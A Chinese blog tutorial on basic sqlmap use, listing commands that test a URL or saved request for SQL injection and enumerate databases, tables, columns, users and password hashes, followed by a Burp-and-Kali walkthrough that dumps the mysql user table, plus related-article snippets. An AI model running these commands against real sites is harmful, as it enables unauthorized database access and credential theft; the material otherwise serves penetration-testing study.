sqlmap基础使用

最新推荐文章于 2024-08-22 15:48:42 发布
最新推荐文章于 2024-08-22 15:48:42 发布
阅读量177 收藏 1
点赞数
文章标签: sql 数据库 mysql 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_59607911/article/details/133858453
版权

一、命令

1、判断是否存在注入
 
sqlmap.py -u url
 
(如果注入点后面的参数大于等于两个,需要加双引号)
 
 
 
2、判断文本中的请求是否存在注入
 
Sqlmap.py -r desktop/1.txt
 
一般在存在cookies注入的情况下使用
 
 
 
3、查询当前用户下的所有数据库
 
sqlmap.py -u url --dbs
 
确定网站存在注入后,用于查询当前用户下的所有数据库。如果当前用户有权限读取包含所有数据库列表信息的表,使用该命令就可以列出所有相关数据库。
 
 
 
4、获取数据库中的表名
 
sqlmap.py -u “url” -D dkeye(具体数据库) --tables
 
如果不加入-D来指定某一个数据库,那么会列出数据库中的所有的表。继续注入时缩写成—T,在某表中继续查询
 
 
 
5、获取表中的字段名
 
sqlmap.py -u “url” -D dkeye -T user_info(具体表名) --columns
 
查询完表名后,查询该表中的字段名,在后续的注入中,—columns缩写成-C
 
 
 
6、获取字段内容
 
sqlmap.py -u “url” -D dkeye -T user_info(具体表名) -C usrname password(具体字段) --dump
 
 
 
7、获取数据库所有用户
 
sqlmap.py -u url --users
 
列出数据库所有用户,如果当前用户有权限读取包含所有用户的表的权限时,使用该命令就可以列出所有管理用户。
 
 
 
8、获取数据库用户的密码
 
sqlmap.py -u url --passwords
 
如果当前用户有读取包含用户密码的权限,sqlmap会先例举出用户,然后列出hash,并尝试破解。
 
 
 
9、获取当前网站数据库的名称
 
sqlmap.py -u url --curerent-db
 
使用该命令可以列出当前网站使用的数据库
 
 
 
10、获取当前网站数据库的用户名称
 
sqlmap.py -u url --current-user
 
使用该命令可以列出当前网站使用的数据库用户

 二、具体过程: 

1.用brup进行抓包

 

2.将包复制到kali里面 

3.判断文本中的请求是否存在注入 

sqlmap -r 

4.完成后会有提示存在哪些SQL注入 

5.查询当前用户下的所有数据库

sqlmap -r '/home/kali/Desktop/111.txt' --dbs

6.查表名

  sqlmap -r '/home/kali/Desktop/111.txt' -D mysql --tables

7.查字段名

sqlmap -r '/home/kali/Desktop/111.txt' -D mysql -T user --columns  

 8.获取字段内容

 sqlmap -r '/home/kali/Desktop/111.txt' -D mysql -T user -C Host --dump

悲郁的秋裤
关注
【神兵利器】——173、SQLMap基础使用
Fly_鹏程万里
10-16 22
SQLmap是一款流行的自动化SQL注入工具,它可以帮助安全测试人员和黑客自动化地探测和利用Web应用程序中的SQL注入漏洞,它支持多种不同的数据库管理系统,例如:MySQL、Oracle、PostgreSQL和Microsoft SQL Server等,SQLmap可以通过发送特定的SQL注入Payload来检测和利用SQL注入漏洞并且可以执行多种不同的操作,例如:获取数据库中的数据、绕过身份验证、执行系统命令等。
SQL-SQLMAP基础使用
qq_64332865的博客
02-19 5888
SQLMAP是一个开源的自动化SQL注入工具,其主要功能是扫描、发现并利用给定的URL的SQL注入漏洞。 SQLMAP的基本功能包括:判断可注入的参数、判断可以使用哪一种SQL注入技术进行注入、判断识别数据库的类型以及根据用户的选择从数据库中读取数据。SQLMAP支持的注入技术包括以下五种: ( 1)基于布尔的盲注:根据返回页面判断条件真假的注入。 (2)基于时间的盲注:不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 (3)基于报错的注入:页面会返回错
SQL查看表字段信息如:字段名、字段类型、字段精度、字段大小、索引、主键等
努力让自己发光,对的人才能迎着光而来
04-28 2万+
目录表名、字段名、字段类型、字段精度、字段大小字段名、是否为主键、字段类型、字段大小、索引名 表名、字段名、字段类型、字段精度、字段大小 SQL: use [test] -- 修改库名 SELECT t.table_name, -- 表名 c.column_name, -- 字段名 c.data_type, -- 字段类型 c.numeric_precision, -- 字段精度 ISNULL(CHARACTER_MAXIMUM_LENGTH,0
SqlMap
zhaji001
12-18 1万+
收集的一些技巧资源来之互联网 -u #注入点 -f #指纹判别数据库类型 -b #获取数据库版本信息 -p #指定可测试的参数(?page=1&id=2 -p “page,id”) -D “” #指定数据库名 -T “” #指定表名 -C “” #指定字段 -s “” #保存注入过程到一个文件,还可中断,下次恢复在注入(保存:-s “xx.log”  恢复:-s “xx.log” –r...
Sqlmap工具使用指南
最新发布
qq_57163799的博客
08-22 1298
Sqlmap使用姿势、参数解析、基础命令、进阶命令、使用实例解析!!!
sqlmap基本使用
m0_55641973的博客
06-04 2099
-common-columns # 暴力破解字段, --common-tables # 暴力破解表。--users # 查询所有的数据库账号 --current-user # 查询当前数据库用户。--tables # 查看所有的表。--predict-output # 优化检测方法,不断比对大数据,缩小检测范围,提高效率。
sqlmap工具的使用 (超详细附工具版)
读书 买花 长大
06-11 3397
sqlmap
sqlmap使用教程(5)-信息获取
fanmeng2008的博客
01-24 1352
渗透测试过程中,信息获取得到数据库名称一般就可以,点到为止,渗透测试的目的是测试系统是否有风险漏洞,而不是为了获取数据库信息
SQLmap基础使用
shangMD01的博客
02-18 730
实验环境 操作系统:Windows10 安装的应用软件:Sqlmap、FireFox浏览器插件HackBar;Apache、MySQL、PHP;DVWA、SQLi-Labs漏洞网站环境 实验步骤 1.访问SQLi-Labs网站Less-3 http://靶机ip/sql/Less-3 登录后,根据网页提示,先给定一个GET参数: /http://靶机ip/sql/Less-3/?id=1 2.启动SQLmap 找到SQLmap所在目录输入cmd进入命令行,输入命令启动SQLma
漏洞利用SQL注入及sqlmap基础使用
m0_57379855的博客
03-27 2169
漏洞利用SQL注入及sqlmap基础使用sqlmap下载sqlmap注入语句sql-las下载部署数据库Less-1Less-5布尔盲注布尔盲注常用语句二次查询注入二次查询常用函数二次查询构造语句报错注入报错注入常用语句Less-9时间盲注时间盲注常用语句 sqlmap下载 sqlmap 可以在Linux使用,也可以在Windows使用 使用的前提是要有python环境 sqlmap注入语句 语句 目的 sqlmap -u “http://localhost/sqli-labs/Less
SQL注入-SQLMAP基础使用
xdjxi的博客
02-19 2246
实验目的 了解SQLMAP实验步骤的工作原理,熟悉SQLMAP的常用命令,掌握SQLMAP的-r参数的基本使用方法。 实验步骤 本实验的目标是:以SQLi-Labs 网站的Less-4为入口,利用SQLMAP实施自动化SQL注入,获取 SQLi-Labs 网站的登录用户名和密码。 1.访问SQLi-Labs 网站 在攻击机 Pentest-Atk打开FireFox浏览器,并访问靶机A-SQLi-Labs 上的sQLi-Labs 网站Less-4。访问的URL为:http:/ / [靶机 IP]..
SQLmap基本使用
weixin_48712514的博客
05-17 285
SQLmap - SQL 注入神器 SQLmap是一款专注于SQLi的工具,堪称神器。 SQLmap基于Python 语言编写的命令行工具,集成在Kali 中 SQLmap 的更新 sudo apt-get updatesudo apt-get install sqlmap -U 检测注入点 –dbs 列出所有的库名 –current-user 当前连接数据库用户的名字 –current-db 当前数据库名字 -D “cms” 指定目标数据库为cm
SQLMAP工具 详细使用方法
HAKUNAMATATATTA的博客
11-15 4717
SQLMAP 是一个开源的渗透测试工具,可以用来自动化的检测,利用 SQL 注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。
sqlmap的简单查询
hclimg的博客
05-03 5761
sqlmap是一个自动化的sql注入工具,主要功能是扫描、发现并利用给定的url的sql注入漏洞,还内置了很多的绕过插件。sqlmap采用了五种sql注入技术: 基于布尔类型的盲注,即可以根据返回页面判断条件真假的注入。 基于时间的盲注,即不能根据页面返回的内容判断任何的信息,要用条件语句查看时间延迟语句是否已执行(即页面返回时间是否增加)来判断。 基于报错注入,即页面会返回错误信...
sqlmap使用教程大全命令大全(图文)
热门推荐
Cwillchris的博客
03-15 6万+
我们先准备一个靶机,我这拿经典的SQL大观园靶机 我们再url后面传参http://192.168.98.100/sqli-labs/Less-1/?id=1 接下来我们用此url进行SQLmap的教学http://192.168.98.100/sqli-labs/Less-1/?id=1 一、SQLmap基础操作 1.判断是否存在注入 假设目标注入点是http://192.168.98.100/sqli-labs/Less-1/?id=1,判断具是否存在注入的命令如下所示.
sqlmap用户手册(六)——列数据
从此寂寞的自留地
11-08 6759
列数据 标志 参数:-b,--banner 大多数的数据库系统都有一个函数可以返回数据库的版本号,通常这个函数是version()或者变量@@version这主要取决与是什么数据库。 用户 参数:-current-user 在大多数据库中可以获取到管理数据的用户。 当前数据库 参数:--current-db 返还当前连接的数据库。 当
SQLMAP注入教程-11种常见SQLMAP使用方法详解
dfdhxb995397的博客
08-24 4293
sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了。今天把我一直以来整理的sqlmap笔记发布上来供大家参考。 一共有11种常见SQLmap使用方法:一、SQLMAP用于Access数据库注入(1) 猜解是否能注入 ...
获取字段_技术干货 | 利用sqlmap 获取管理员账号密码
weixin_39606911的博客
12-17 300
首先,先简单介绍下sqlmap简介:sqlmap是一种开源的渗透测试工具,可以自动检测和利用SQL注入漏洞以及接入该数据库的服务器。它拥有非常强大的检测引擎、具有多种特性的渗透测试器、通过数据库指纹提取访问底层文件系统并通过外带连接执行命令。支持的数据库MySQL,Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, I...
sqlmap使用基础
04-27
以下是SQLMAP工具的基础使用方法[^1]: 1. 获取数据库表: ```shell sqlmap -u "http://192.168.164.1/sqllabs/Less-1/?id=1" --dbms mysql -v 1 -D security --tables ``` 这个命令将会获取指定URL中的数据库security中的所有表。 2. 获取表的字段: ```shell sqlmap -u "http://192.168.164.1/sqllabs/Less-1/?id=1" --dbms mysql -v 1 -D security -T users --columns ``` 这个命令将会获取数据库security中表users的所有字段。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值